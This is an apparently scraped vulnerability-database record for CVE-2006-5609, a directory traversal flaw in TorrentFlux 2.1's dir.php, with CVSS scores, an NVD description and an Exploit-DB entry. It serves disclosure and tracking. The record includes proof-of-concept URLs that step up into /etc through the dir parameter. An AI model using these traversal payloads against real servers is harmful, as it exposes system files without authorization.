ID OSVDB:31523
Type osvdb
Reporter OSVDB
Modified 2006-10-26T00:06:01
Description
Manual Testing Notes
http://[target]/torrentfluxroot/dir.php?dir=../../../etc/
References:
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0435.html
CVE-2006-5609
Bugtraq ID: 20771
{"href": "https://vulners.com/osvdb/OSVDB:31523", "id": "OSVDB:31523", "reporter": "OSVDB", "published": "2006-10-26T00:06:01", "description": "## Manual Testing Notes\nhttp://[target]/torrentfluxroot/dir.php?dir=../../../etc/\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0435.html\n[CVE-2006-5609](https://vulners.com/cve/CVE-2006-5609)\nBugtraq ID: 20771\n", "title": "TorrentFlux dir.php dir Variable Traversal Arbitrary Directory List", "lastseen": "2017-04-28T13:20:27", "bulletinFamily": "software", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "references": [], "edition": 1, "cvelist": ["CVE-2006-5609"], "affectedSoftware": [], "viewCount": 1, "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2017-04-28T13:20:27", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-5609"]}, {"type": "exploitdb", "idList": ["EDB-ID:28867"]}], "modified": "2017-04-28T13:20:27", "rev": 2}, "vulnersScore": 6.3}, "modified": "2006-10-26T00:06:01"}
{"cve": [{"lastseen": "2020-10-03T11:48:19", "description": "Directory traversal vulnerability in dir.php in TorrentFlux 2.1 allows remote attackers to list arbitrary directories via \"\\.\\./\" sequences in the dir parameter.", "edition": 3, "cvss3": {}, "published": "2006-10-30T23:07:00", "title": "CVE-2006-5609", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-5609"], "modified": "2018-10-17T21:43:00", "cpe": ["cpe:/a:torrentflux:torrentflux:2.1"], "id": "CVE-2006-5609", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5609", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:torrentflux:torrentflux:2.1:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-03T09:06:32", "description": "TorrentFlux 2.1 Dir.PHP Directory Traversal Vulnerability. CVE-2006-5609. Webapps exploit for php platform", "published": "2006-10-27T00:00:00", "type": "exploitdb", "title": "TorrentFlux 2.1 Dir.PHP Directory Traversal Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5609"], "modified": "2006-10-27T00:00:00", "id": "EDB-ID:28867", "href": "https://www.exploit-db.com/exploits/28867/", "sourceData": "source: http://www.securityfocus.com/bid/20771/info\r\n\r\nTorrentFlux is prone to a directory-traversal vulnerability because the application fails to properly sanitize user-supplied input. \r\n\r\nAn attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid attackers in further attacks.\r\n\r\nTorrentFlux 2.1 is reported vulnerable; other versions may be affected as well.\r\n\r\nhttp://www.example.com/torrentfluxroot/dir.php?dir=\\.\\./\\.\\./\\.\\./etc/", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/28867/"}]}
